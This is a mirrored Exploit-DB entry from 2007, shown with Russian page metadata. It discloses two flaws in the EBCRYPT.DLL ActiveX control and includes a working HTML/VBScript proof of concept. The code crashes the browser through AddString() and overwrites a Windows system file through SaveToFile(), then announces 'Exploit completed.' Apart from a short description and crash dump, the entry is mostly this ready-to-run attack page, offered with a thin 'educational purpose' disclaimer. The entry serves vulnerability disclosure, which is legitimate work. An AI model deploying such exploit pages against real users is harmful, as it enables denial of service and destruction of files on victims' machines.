- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4453
- Проверка EDB
-
- Пройдено
- Автор
- SHINNAI
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-5111 cve-2007-5110
- Дата публикации
- 2007-09-24
HTML:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>EB Design Pty Ltd (EBCRYPT.DLL v.2.0) Multiple Remote Vulnerabilites</b>
url: http://www.ebcrypt.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b>Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller, data
KillBitSet: False</b>
This control contains two vulnerabilities:
1) It is possible to cause a DoS passing at least one character to
"AddString()" method. This is a dump of exception:
Access violation when reading [3A433B2E]
03158CA4 FF51 10 => CALL DWORD PTR DS:[ECX+10] <-- crash
ECX 3A433B2E <-- ".;C:" (is a part of path)
2) It is possible to overwrite a file passed as argument to "SaveToFile()"
method
-----------------------------------------------------------------------------
<object classid='clsid:3C34EAC7-9904-4415-BBE4-82AA8C0C0BE8' id='test1'></object>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test2'></object>
<input language=VBScript onclick=tryAddString() type=button value='Click here to start AddString test '>
<input language=VBScript onclick=trySaveToFile() type=button value='Click here to start SaveToFile test'>
<script language='vbscript'>
Sub tryAddString
test1.AddString "A"
End Sub
Sub trySaveToFile
test2.SaveToFile "C:\WINDOWS\system_.ini"
MsgBox "Exploit completed."
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-09-24]- Источник
- www.exploit-db.com
